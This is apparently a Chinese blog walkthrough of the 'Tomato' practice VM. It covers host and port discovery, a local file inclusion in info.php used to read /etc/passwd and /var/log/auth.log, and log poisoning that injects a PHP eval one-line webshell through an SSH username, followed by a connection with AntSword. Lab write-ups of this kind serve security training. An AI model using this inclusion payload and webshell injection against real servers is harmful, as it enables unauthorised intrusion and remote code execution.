Tomato靶机攻略

将tomato改为NAT模式

扫描ip

arp-scan -l

扫描端口,发现ssh服务端口从22改为2211

扫描目录

发现http://192.168.31.134/antibot_image/ 访问

查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

info.php?image=/var/log/auth.log

使用ssh登录,看日志里会不会出现记录

发现日志中有记录

使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接

相关推荐
whysqwhw4 分钟前
Kuikly 扩展原生 API 的完整流程
前端
whysqwhw6 分钟前
Hippy 跨平台框架扩展原生自定义组件
前端
OEC小胖胖8 分钟前
页面间的导航:`<Link>` 组件和 `useRouter`
前端·前端框架·web·next.js
faimi44 分钟前
🚀程序员必收藏!最全Git命令手册:解决90%团队协作难题
前端·gitlab
帅得不敢出门1 小时前
Docker安装Ubuntu搭建Android SDK编译环境
android·ubuntu·docker
liulilittle1 小时前
UNIX/macOS路由表查询原理与实现
服务器·开发语言·c++·macos·unix·编程语言
Hi202402171 小时前
基于阿里云部署 RustDesk 自托管服务器
运维·服务器·阿里云·云计算·远程控制·远程桌面
IDOlaoluo1 小时前
OpenSSL 1.0.1e 下载解压和运行方法(小白适用 附安装包)
linux
tangweiguo030519871 小时前
Android Kotlin 动态注册 Broadcast 的完整封装方案
android·kotlin
赖龙1 小时前
记录SSL部署,链路不完整问题
网络·网络协议·ssl